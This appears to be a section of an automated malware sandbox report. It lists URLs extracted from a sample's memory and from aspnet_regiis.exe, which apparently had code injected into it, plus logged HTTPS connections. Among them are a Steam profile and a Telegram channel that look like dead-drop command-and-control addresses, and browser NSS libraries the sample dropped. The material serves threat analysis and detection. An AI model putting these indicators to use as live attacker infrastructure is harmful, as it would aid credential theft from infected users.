                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: ECBGCB.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: file.exeString found in binary or memory: https://pidgin.im0
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002EDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/$b
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org#
                          Source: aspnet_regiis.exe, 00000003.00000002.3378636469.000000001BA7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: aspnet_regiis.exe, 00000003.00000002.3378636469.000000001BA7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
